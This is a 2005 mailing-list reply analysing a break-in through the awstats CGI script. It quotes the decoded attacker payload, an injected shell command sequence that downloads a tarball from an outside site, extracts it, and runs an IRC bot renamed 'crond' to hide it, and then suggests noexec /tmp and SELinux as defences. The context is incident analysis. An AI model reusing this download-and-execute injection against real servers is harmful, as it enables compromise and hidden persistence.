Security Breach

Paul Howarth paul at
Fri Mar 4 19:30:23 UTC 2005

On Fri, 2005-03-04 at 12:51 -0600, Brian Fahrlander wrote:
> On Fri, 2005-03-04 at 17:58 +0000, Paul Howarth wrote:
> > Replace the url-encoded characters and you get:
> > 
> > /cgi-bin/|echo ;echo b_exp;cd /tmp;curl -0 wget 
> >;tar -zxvf badboy.tar.gz;cd psybnc;mv 
> > mech crond;export PATH=;crond;echo e_exp;%00
> > 
> > So the attacker has tricked the script into executing a set of shell 
> > commands, which include changing directory to /tmp, downloading a 
> > tarball from a Romanian site, extracting that tarball and then executing 
> > a program from the downloaded and extracted tarball, after renaming it 
> > to "crond" in an effort to disguise it.
>    Damned fine research.  Good job; I'm impressed.

Thank you!

Incidentally, some of the suggestions that came up earlier in this
discussion, namely mounting /tmp with the noexec option and running
SELinux, would have foiled *this particular* exploit of the awstats

Paul Howarth <paul at>

More information about the users mailing list